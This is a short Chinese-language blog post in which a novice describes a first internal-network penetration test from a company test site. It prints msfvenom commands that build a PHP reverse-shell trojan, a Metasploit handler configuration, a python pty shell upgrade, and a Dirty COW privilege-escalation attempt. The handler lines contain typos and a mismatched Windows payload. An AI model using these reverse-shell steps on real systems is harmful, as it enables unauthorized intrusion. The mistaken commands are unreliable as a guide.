0x00 前言

公司的测试站,拿到了一个shell,然后准备内网一波,技术菜,第一次尝试内网渗透

0x01 反弹shell

公司大佬仍了一个shell,使用冰蝎连接后发现命令行不好用,命令无法成功执行,因为是linux的,所以准备提权用脏牛提权一波,但是执行gcc命令,没有返回。。没办法只能上msf了,开整.

首先是用msf生成了一个php的反弹木马

msfvenom -p php/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f raw >text.php

下面就是用msf接收反弹的shell了

set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.1
set lport 4444
set ExirOnSession flase
exploit

把生成的php木马上传到客户网站,然后运行一波
反弹成功

使用一条python命令返回一个回显窗口

python -c 'import pty;pty.spawn("/bin/bash")'

看了下权限,很低,所以尝试用脏牛,但是内核是4.15.0-45-generic #48~16.04.1-Ubuntu SMP Tue Jan 29 18:03:48 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux 版本太高了,没办法提权,只能测试其他方法了